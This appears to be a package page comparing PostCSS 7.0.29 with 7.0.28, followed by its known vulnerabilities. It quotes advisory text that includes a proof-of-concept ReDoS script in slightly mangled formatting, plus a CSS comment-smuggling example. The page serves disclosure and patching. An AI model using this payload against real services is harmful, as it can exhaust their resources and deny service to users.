PostCSS version 7.0.29 represents a mild iteration over its predecessor, version 7.0.28, both serving as robust tools for transforming styles using JavaScript plugins. These versions maintain identical core dependencies, including Chalk for colorful console output, Source Map for debugging, and Supports Color for terminal color detection. The foundational aspects, such as the MIT license, the official Git repository, and authorship by Andrey Sitnik, remain unchanged, ensuring continuity and trust for developers familiar with the PostCSS ecosystem. Furthermore, the Tidelift funding link persists, underscoring the project's commitment to sustainability and long-term maintenance.
The primary distinguishable feature lies in the subtle differences in their dist attributes. While both versions comprise 38 files, version 7.0.29 exhibits a slightly larger unpacked size of 1,087,207 bytes compared to version 7.0.28's 1,087,166 bytes. This minute size difference, combined with the release date gap of approximately two days between the versions, suggests that version 7.0.29 likely contains minor bug fixes, performance enhancements, or very small feature additions that don't fundamentally alter the API or core functionality. Developers should consult the project's changelog or commit history for precise details on these incremental changes. If you are using the 7.0.28 version and you don't have particular problems you may not need to update. If there is a problem you want to solve that is fixed in the new version, then the update is suggested.
All the vulnerabilities related to the version 7.0.29 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.